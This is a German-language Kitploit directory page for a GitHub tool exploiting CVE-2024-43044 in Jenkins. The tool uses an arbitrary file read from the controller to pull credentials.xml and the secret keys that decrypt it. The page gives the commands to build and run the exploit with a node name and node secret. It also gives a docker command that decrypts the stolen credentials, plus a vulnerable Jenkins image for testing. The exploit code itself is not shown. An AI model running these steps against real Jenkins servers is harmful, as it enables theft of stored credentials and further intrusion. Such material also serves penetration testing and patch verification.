Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-43044-jenkins-creds — Exploit für CVE-2024-43044, der beliebiges Dateilesen vom Jenkins-Controller ermöglicht, um credentials.xml mit geheimen Schlüsseln zu extrahieren und zu entschlüsseln. | Kitploit
Tools/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
Verschlüsselungs-/EntschlüsselungstoolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

Exploit für CVE-2024-43044, der beliebiges Dateilesen vom Jenkins-Controller ermöglicht, um credentials.xml mit geheimen Schlüsseln zu extrahieren und zu entschlüsseln.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Einführung

Dies ist ein Exploit für CVE-2024-43044, ein beliebiges Dateilesen, das es einem Agenten ermöglicht, Dateien vom Controller abzurufen.

Der Exploit wird die Schwachstelle nutzen, um die Datei credentials.xml zu lesen und geheime Schlüssel zu erhalten, mit denen sie entschlüsselt wird.

Ursprünglicher Code : https://github.com/convisolabs/CVE-2024-43044-jenkins Ursprünglicher Artikel : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Erstellen des Exploits

root@kitploit:~
mvn package

Ausführen des Exploits

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

credentials.xml entschlüsseln

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Testen

Du kannst es in einer verwundbaren Version mit Docker testen:

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Sobald du einen laufenden Jenkins hast, richte einen Agenten ein.

Tool herunterladen